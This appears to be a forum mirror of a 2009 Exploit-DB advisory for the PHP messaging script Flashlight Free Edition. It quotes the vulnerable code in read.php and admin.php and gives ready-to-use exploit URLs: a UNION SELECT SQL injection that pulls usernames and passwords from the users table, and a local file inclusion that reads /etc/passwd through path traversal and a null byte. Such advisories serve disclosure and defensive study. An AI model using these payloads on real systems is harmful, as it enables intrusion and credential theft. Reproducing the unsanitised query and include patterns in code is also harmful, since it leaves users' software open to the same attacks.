- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8856
- Проверка EDB
-
- Пройдено
- Автор
- K4M1K451
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4205 cve-2009-4204
- Дата публикации
- 2009-06-02
Код:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
RATM: "All hell can't stop us now!"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451
--[E-mail : k4m1k451@gmail.com
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script : Flashlight
--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Remote SQLi
--[File : read.php
--[Vul :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");
--[Exploit :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Local File Inclusion
--[File : admin.php
--[Vul :
$inc = $_GET['action'];
include ("admin/".$inc.".php");
--[Exploit :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# milw0rm.com [2009-06-02]- Источник
- www.exploit-db.com
